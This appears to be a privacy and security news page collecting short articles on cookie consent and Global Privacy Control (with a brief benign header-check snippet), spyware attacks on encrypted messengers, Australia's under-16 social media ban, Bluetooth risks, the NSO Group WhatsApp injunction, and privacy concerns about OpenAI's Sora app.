Choosing accept all gives consent for the site and third parties to use every category of cookie and tracker. This enables full functionality and personalised features, including tailored advertising driven by your behaviour profile. 

Selecting reject all (or ignoring the banner) typically blocks every cookie except those essential for the site to work. You still access core services, but may lose personalisation and see fewer or less relevant embedded third-party elements. Your decision is stored in a consent cookie and many sites will ask you again after six to twelve months.

Privacy, GDPR and control

Under the EU’s GDPR, cookies that identify users count as personal data, so sites must request consent, explain what is being tracked, document that consent and make it easy to refuse or withdraw it. Many websites outside the EU follow similar rules because they handle European traffic.

To reduce consent fatigue, a specification called Global Privacy Control lets browsers send a built-in privacy signal instead of forcing users to click through banners on every site, though adoption remains limited and voluntary. If you regret earlier choices, you can clear cookies in your browser settings, which resets consent but also signs you out of most services.
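To make the mechanism concrete, here is a short sketch of how a server might honour the Global Privacy Control signal, which participating browsers send as the request header `Sec-GPC: 1`. This is an illustrative assumption about server-side handling, not any particular site's code:

```python
def gpc_opt_out(headers: dict) -> bool:
    """Return True when a request carries the Global Privacy Control
    opt-out signal, i.e. the `Sec-GPC: 1` request header.

    HTTP header names are case-insensitive, so normalise before lookup.
    """
    normalised = {name.lower(): value for name, value in headers.items()}
    return normalised.get("sec-gpc", "").strip() == "1"


# Illustrative request headers (hypothetical values):
print(gpc_opt_out({"Sec-GPC": "1", "User-Agent": "ExampleBrowser"}))  # True
print(gpc_opt_out({"User-Agent": "ExampleBrowser"}))                  # False
```

A site honouring the signal would treat such a request as if the visitor had clicked "reject all" for non-essential cookies; as noted above, adoption of GPC remains limited and voluntary.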

Encrypted Chats Under Siege: Cyber-Mercenaries Target High-Profile Users

 

Encrypted communication, once considered the final refuge for those seeking private dialogue, now faces a wave of targeted espionage campaigns that strike not at the encryption itself but at the fragile devices that carry it. Throughout this year, intelligence analysts and cybersecurity researchers have observed a striking escalation in operations using commercial spyware, deceptive app clones, and zero-interaction exploits to infiltrate platforms such as Signal and WhatsApp.
 
What is emerging is not a story of broken cryptographic protocols, but of adversaries who have learned to manipulate the ecosystem surrounding secure messaging, turning the endpoints themselves into compromised windows through which confidential conversations can be quietly observed.
  
The unfolding threat does not resemble the mass surveillance operations of previous decades. Instead, adversarial groups, ranging from state-aligned operators to profit-driven cyber-mercenaries, are launching surgical attacks against individuals whose communications carry strategic value.
 
High-ranking government functionaries, diplomats, military advisors, investigative journalists, and leaders of civil society organizations across the United States, Europe, the Middle East, and parts of Asia have found themselves increasingly within the crosshairs of these clandestine campaigns.
 
The intent, investigators say, is rarely broad data collection. Rather, the aim is account takeover, message interception, and long-term device persistence that lays the groundwork for deeper espionage efforts.
 

How Attackers Are Breaching Encrypted Platforms

 
At the center of these intrusions is a shift in methodology: instead of attempting to crack sophisticated encryption, threat actors compromise the applications and operating systems that enable it. Across multiple investigations, researchers have uncovered operations that rely on:
 
1. Exploiting Trusted Features
 
Russia-aligned operators have repeatedly abused the device-linking capabilities of messaging platforms, persuading victims—via social engineering—to scan malicious connection requests. This enables a stealthy secondary device to be linked to a target’s account, giving attackers real-time access without altering the encryption layer itself.
 
2. Deploying Zero-Interaction Exploits
 
Several campaigns emerged this year in which attackers weaponized vulnerabilities that required no user action at all. Specially crafted media files sent via messaging apps, or exploit chains triggered upon receipt, allowed silent compromise of devices, particularly on Android models widely used in conflict-prone regions.
 
3. Distributing Counterfeit Applications
 
Clone apps impersonating popular platforms have proliferated across unofficial channels, especially in parts of the Middle East and South Asia. These imitations often mimic user interfaces with uncanny accuracy while embedding spyware capable of harvesting chats, recordings, contact lists, and stored files.
 
4. Leveraging Commercial Spyware and “Cyber-For-Hire” Tools
 
Commercial surveillance products, traditionally marketed to law enforcement or intelligence agencies, continue to spill into the underground economy. Once deployed, these tools often serve as an entry point for further exploitation, allowing attackers to drop additional payloads, manipulate settings, or modify authentication tokens.
 

Why Encrypted Platforms Are Under Unprecedented Attack

 
Analysts suggest that encrypted applications have become the new battleground for geopolitical intelligence. Their rising adoption by policymakers, activists, and diplomats has elevated them from personal communication tools to repositories of sensitive, sometimes world-shaping information.
 
Because the cryptographic foundations remain resilient, adversaries have pivoted toward undermining the assumptions around secure communication—namely, that the device you hold in your hand is trustworthy. In reality, attackers are increasingly proving that even the strongest encryption is powerless if the endpoint is already compromised.
  
Across the world, governments are imposing stricter regulations on spyware vendors and reassessing the presence of encrypted apps on official devices. Several legislative bodies have either limited or outright banned certain messaging platforms in response to the increasing frequency of targeted exploits.
 
Experts warn that the rise of commercialized cyber-operations, where tools once reserved for state intelligence now circulate endlessly between contractors, mercenaries, and hostile groups, signals a long-term shift in digital espionage strategy rather than a temporary spike.
 

What High-Risk Users Must Do

 
Security specialists emphasize that individuals operating in sensitive fields cannot rely on everyday digital hygiene alone. Enhanced practices, such as hardware isolation, phishing-resistant authentication, rigid permission control, and using only trusted app repositories, are rapidly becoming baseline requirements.
 
Some also recommend adopting hardened device modes, performing frequent integrity checks, and treating unexpected prompts (including QR-code requests) as potential attack vectors.

Australia Bans Under-16s from Social Media Starting December

 

Australia is introducing a world-first ban blocking under-16s from most major social media platforms, and Meta has begun shutting down or freezing teen accounts in advance of the law taking effect. 

From 10 December, Australians under 16 will be barred from using platforms including Instagram, Facebook, Threads, TikTok, YouTube, X, Reddit, Snapchat and others, with services facing fines up to A$50m if they do not take “reasonable steps” to keep underage users out. Prime Minister Anthony Albanese has called the measure “world-leading”, arguing it will protect children from online pressure, unwanted contact and other risks. 

Meta’s account shutdown plan

Meta has started messaging users it believes are 13–15 years old, telling them their Instagram, Facebook and Threads accounts will be deactivated from 4 December and that no new under-16 accounts can be created from that date. Affected teens are being urged to update contact details so they can be notified when eligible to rejoin and are given options to download and save their photos, videos and messages before deactivation. 

Teens who say they are old enough to stay on the platforms can challenge Meta’s decision by submitting a “video selfie” for facial age estimation or uploading a driving licence or other government ID. These and other age-assurance tools were recently tested for the Australian government, with the trial concluding that no single foolproof solution exists and that each method has trade-offs.

Enforcement, concerns and workarounds

Australia’s e-Safety Commissioner says the goal is to shield teens from harm while online, but platforms warn tech-savvy young people may try to circumvent restrictions and argue instead for laws requiring parental consent for under-16s. In a related move, Roblox has said it will block under-16s from chatting with unknown adults and will introduce mandatory age verification for chat in Australia, New Zealand and the Netherlands from December before expanding globally. 

The e-Safety regulator has listed the services subject to the ban: Facebook, Instagram, Kick, Reddit, Snapchat, Threads, TikTok, X and YouTube. Exempt services include Discord, GitHub, Google Classroom, Lego Play, Messenger, Roblox, Steam and Steam Chat, WhatsApp and YouTube Kids, which are viewed as either educational, messaging-focused or more controlled environments for younger users.

Bluetooth Security Risks: Why Leaving It On Could Endanger Your Data

 

Bluetooth technology, widely used for wireless connections across smartphones, computers, health monitors, and peripherals, offers convenience but carries notable security risks—especially when left enabled at all times. While Bluetooth security and encryption have advanced over decades, the protocol remains exposed to various cyber threats, and many users neglect these vulnerabilities, putting personal data at risk.

Common Bluetooth security threats

Leaving Bluetooth permanently on is among the most frequent cybersecurity oversights. Doing so effectively announces your device’s continuous availability to connect, making it a target for attackers. 

Threat actors exploit Bluetooth through methods like bluesnarfing—the unauthorized extraction of data—and bluejacking, where unsolicited messages and advertisements are sent without consent. If hackers connect, they may siphon valuable information such as banking details, contact logs, and passwords, which can subsequently be used for identity theft, fraudulent purchases, or impersonation.

A critical issue is that data theft via Bluetooth is often invisible—victims receive no notification or warning. Further compounding the problem, Bluetooth signals can be leveraged for physical tracking. Retailers, for instance, commonly use Bluetooth beacons to trace shopper locations and gather granular behavioral data, raising privacy concerns.

Importantly, Bluetooth-related vulnerabilities affect more than just smartphones; they extend to health devices and wearables. Although compromising medical Bluetooth devices such as pacemakers or infusion pumps is technically challenging, targeted attacks remain a possibility for motivated adversaries.

Defensive strategies 

Mitigating Bluetooth risks starts with turning off Bluetooth in public or unfamiliar environments and disabling automatic reconnection features when constant use (e.g., wireless headphones) isn’t essential. Additionally, set devices to ‘undiscoverable’ mode as a default, blocking unexpected or unauthorized connections.

Regularly updating operating systems is vital, since outdated devices are prone to exploits like BlueBorne—a severe vulnerability allowing attackers full control over devices, including access to apps and cameras. Always reject unexpected Bluetooth pairing requests and periodically review app permissions, as many apps may exploit Bluetooth to track locations or obtain contact data covertly. 

Utilizing a Virtual Private Network (VPN) enhances overall security by encrypting network activity and masking IP addresses, though this measure isn’t foolproof. Ultimately, while Bluetooth offers convenience, mindful management of its settings is crucial for defending against the spectrum of privacy and security threats posed by wireless connectivity.

US Judge Permanently Bans NSO Group from Targeting WhatsApp Users

 

A U.S. federal judge has issued a permanent injunction barring Israeli spyware maker NSO Group from targeting WhatsApp users with its notorious Pegasus spyware, marking a landmark victory for Meta following years of litigation. 

The decision, handed down by Judge Phyllis J. Hamilton in the Northern District of California, concludes a legal battle that began in 2019, when Meta (the parent company of WhatsApp) sued NSO after discovering that about 1,400 users—including journalists, human rights activists, lawyers, political dissidents, diplomats, and government officials—had been surreptitiously targeted through “zero-click” Pegasus exploits.

The court found that NSO had reverse-engineered WhatsApp’s code and repeatedly updated its spyware to evade detection and security fixes, causing what the judge described as “irreparable harm” and undermining WhatsApp’s core promise of privacy and end-to-end encryption. The injunction prohibits NSO not only from targeting WhatsApp users but also from accessing or assisting others in accessing WhatsApp’s infrastructure, and further requires NSO to erase any data gathered from targeted users.

This victory for Meta was significant, but the court also reduced the previously awarded damages from $168 million to just $4 million, finding the original punitive sum excessive despite NSO’s egregious conduct. Nevertheless, the ruling sets a precedent for how U.S. tech companies can use the courts to combat mercenary spyware operations and commercial surveillance firms that compromise user privacy.

NSO Group argued that the permanent ban could “drive the company out of business,” pointing out that Pegasus is its flagship product used by governments ostensibly for fighting crime and terrorism. An NSO spokesperson claimed the ruling would not impact existing government customers, but Meta and digital rights advocates insist this bans NSO from ever targeting WhatsApp and holds them accountable for civil society surveillance.

The case highlights the ongoing tension between tech giants and commercial spyware vendors and signals a new willingness by courts to intervene to protect user privacy against advanced cyber-surveillance tools.

OpenAI's Sora App Raises Facial Data Privacy Concerns

 

OpenAI's video-generating app, Sora, has raised significant questions regarding the safety and privacy of users' biometric data, particularly with its "Cameo" feature that creates realistic AI videos, or "deepfakes," using a person's face and voice. 

To power this functionality, OpenAI confirms it must store users' facial and audio data. The company states this sensitive data is encrypted during both storage and transmission, and uploaded cameo data is automatically deleted after 30 days. Despite these assurances, privacy concerns remain. The app's ability to generate hyper-realistic videos has sparked fears about the potential for misuse, such as the creation of unauthorized deepfakes or the spread of misinformation. 

OpenAI acknowledges a slight risk that the app could produce inappropriate content, including sexual deepfakes, despite the safeguards in place. In response to these risks, the company has implemented measures to distinguish AI-generated content, including visible watermarks and invisible C2PA metadata in every video created with Sora.

The company emphasizes that users have control over their likeness. Individuals can decide who is permitted to use their cameo and can revoke access or delete any video featuring them at any time. However, a major point of contention is the app's account deletion policy. Deleting a Sora account also results in the termination of the user's entire OpenAI account, including ChatGPT access, and the user cannot register again with the same email or phone number. 

While OpenAI has stated it is developing a way for users to delete their Sora account independently, this integrated deletion policy has surprised and concerned many users who wish to remove their biometric data from Sora without losing access to other OpenAI services.

The app has also drawn attention for potential copyright violations, with users creating videos featuring well-known characters from popular media. While OpenAI provides a mechanism for rights holders to request the removal of their content, the platform's design has positioned it as a new frontier for intellectual property disputes.